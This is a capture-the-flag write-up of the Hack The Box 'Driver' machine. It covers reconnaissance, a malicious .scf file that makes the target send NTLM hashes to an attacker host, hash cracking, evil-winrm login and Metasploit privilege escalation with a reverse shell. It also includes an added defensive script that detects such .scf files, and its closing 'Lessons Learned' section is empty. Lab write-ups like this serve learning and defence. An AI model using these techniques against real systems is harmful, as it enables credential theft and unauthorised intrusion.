htb driver

Information Gathering

# Nmap 7.98 scan initiated Wed Dec 31 09:16:57 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.106
Nmap scan report for 10.10.11.106
Host is up (0.088s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
135/tcp  open  msrpc        Microsoft Windows RPC
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows 10 1607 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows 11 (86%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), Microsoft Windows Vista or Windows 7 (86%), Microsoft Windows Server 2008 R2 or Windows 7 SP1 (85%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.001 days (since Wed Dec 31 09:15:55 2025)
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2025-12-31T15:47:04
|_  start_date: 2025-12-31T15:45:49
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 6h29m44s, deviation: 0s, median: 6h29m44s

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 31 09:17:57 2025 -- 1 IP address (1 host up) scanned in 60.06 seconds

Vulnerability Analysis

Opening http://10.10.11.106/ and entering admin:admin logs us straight in, and we find that firmware can be uploaded. On top of that, the SMB service is open.

SCF NTLM Hash Capture

Windows has a feature: if a folder contains a .scf (Shell Command File) file and Windows Explorer (or some background service) tries to view that folder, the .scf file can instruct the system to load a "remote icon".

Attack Flow

  1. Upload a malicious .scf file that says "fetch the icon from the attacker's machine".
  2. When the target's background service processes the upload directory, it tries to connect to Kali.
  3. When Windows connects to an SMB share, it sends the current user's NTLMv2 hash for authentication by default.
  4. Listening with Responder on Kali captures this hash.
  5. With the hash in hand, crack it to obtain the plaintext password.

Exploitation (User Flag)

Upload a malicious .scf file containing the "fetch the icon from the attacker's machine" instruction:

  Driver nano @exploit.scf
  Driver cat @exploit.scf
[Shell]
Command=2
IconFile=\\10.10.16.3\share\test.ico
[Taskbar]
Command=ToggleDesktop
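From the defender's side, an added example (not part of the original writeup): a small Python check that parses .scf files in an upload directory and flags any whose IconFile points at a UNC path on an untrusted host, which is exactly the pattern the file above relies on. The TRUSTED_HOSTS allow-list and the sample file are assumptions constructed for the example.

```python
"""Added example: flag .scf files whose [Shell] IconFile points at a remote
UNC path, the trigger that makes a service authenticate outbound over SMB."""
import re
from configparser import ConfigParser
from pathlib import Path
from typing import Dict, List, Optional, Tuple

# UNC path: \\host\share\...  (host may be an IP address or a name)
UNC_RE = re.compile(r"^\\\\([^\\]+)\\")

# Hypothetical allow-list of hosts a print server may legitimately reach.
TRUSTED_HOSTS = {"fileserver.corp.local"}


def parse_scf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse SCF (INI-style) text into {section: {key: value}}."""
    cp = ConfigParser(interpolation=None)  # values contain backslashes
    cp.optionxform = str                   # keep 'IconFile' casing
    cp.read_string(text)
    return {s: dict(cp[s]) for s in cp.sections()}


def remote_icon_host(scf: Dict[str, Dict[str, str]]) -> Optional[str]:
    """Return the UNC host named by [Shell] IconFile, or None if local/absent."""
    icon = scf.get("Shell", {}).get("IconFile", "")
    m = UNC_RE.match(icon.strip())
    return m.group(1) if m else None


def classify_scf(text: str) -> str:
    """Verdict for one .scf body: ok, trusted remote host, or alert."""
    host = remote_icon_host(parse_scf(text))
    if host is None:
        return "ok: local or no icon"
    if host in TRUSTED_HOSTS:
        return "ok: trusted host " + host
    return "ALERT: remote icon from untrusted host " + host


def scan_upload_dir(path: str) -> List[Tuple[str, str]]:
    """Classify every .scf file in the given upload directory."""
    return [(p.name, classify_scf(p.read_text(errors="ignore")))
            for p in Path(path).glob("*.scf")]


# Constructed sample mirroring the file used in the writeup.
SAMPLE = ("[Shell]\nCommand=2\nIconFile=\\\\10.10.16.3\\share\\test.ico\n"
          "[Taskbar]\nCommand=ToggleDesktop\n")
```

Run `scan_upload_dir` against the firmware upload directory from a scheduled task and alert on any "ALERT" verdict.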

Start the listener, then upload the file:

  Driver sudo responder -I tun0
[SMB] NTLMv2-SSP Hash     : tony::DRIVER:9df54339562d9c7c:...

Cracking the hash gives tony:liltony:

  Driver evil-winrm -i 10.10.11.106 -u tony -p 'liltony'

Privilege Escalation (Root Flag)

We connect back to msfconsole:

meterpreter > ps
2848  840   taskhostw.exe            x64   1        DRIVER\tony  C:\Windows\System32\taskhostw.exe
meterpreter > migrate 2848  # migrate into an interactive process for session 1
[*] Migrating from 5036 to 2848...
[*] Migration completed successfully.
msf exploit(multi/handler) > use multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 1
run
[*] 10.10.11.106 - Valid modules for session 1:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_comhijack                      Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_dotnet_profiler                Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/bypassuac_fodhelper                      Yes                      The target appears to be vulnerable.
......

Since port 80 is running a printer service, we can try related vulnerabilities.

We check the PowerShell command history:

C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

PS C:\Users\tony> type C:\Users\tony\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Add-Printer -PrinterName "RICOH_PCL6" -DriverName 'RICOH PCL6 UniversalDriver V4.23' -PortName 'lpt1:'

ping 1.1.1.1
ping 1.1.1.1

So we use:

15  exploit/windows/local/ricoh_driver_privesc    Yes   The target appears to be vulnerable. Ricoh driver directory has full permissions
msf exploit(windows/local/ricoh_driver_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/ricoh_driver_privesc) > set session 1
session => 1
msf exploit(windows/local/ricoh_driver_privesc) > set lhost tun0
lhost => 10.10.16.3
msf exploit(windows/local/ricoh_driver_privesc) > run

Lessons Learned
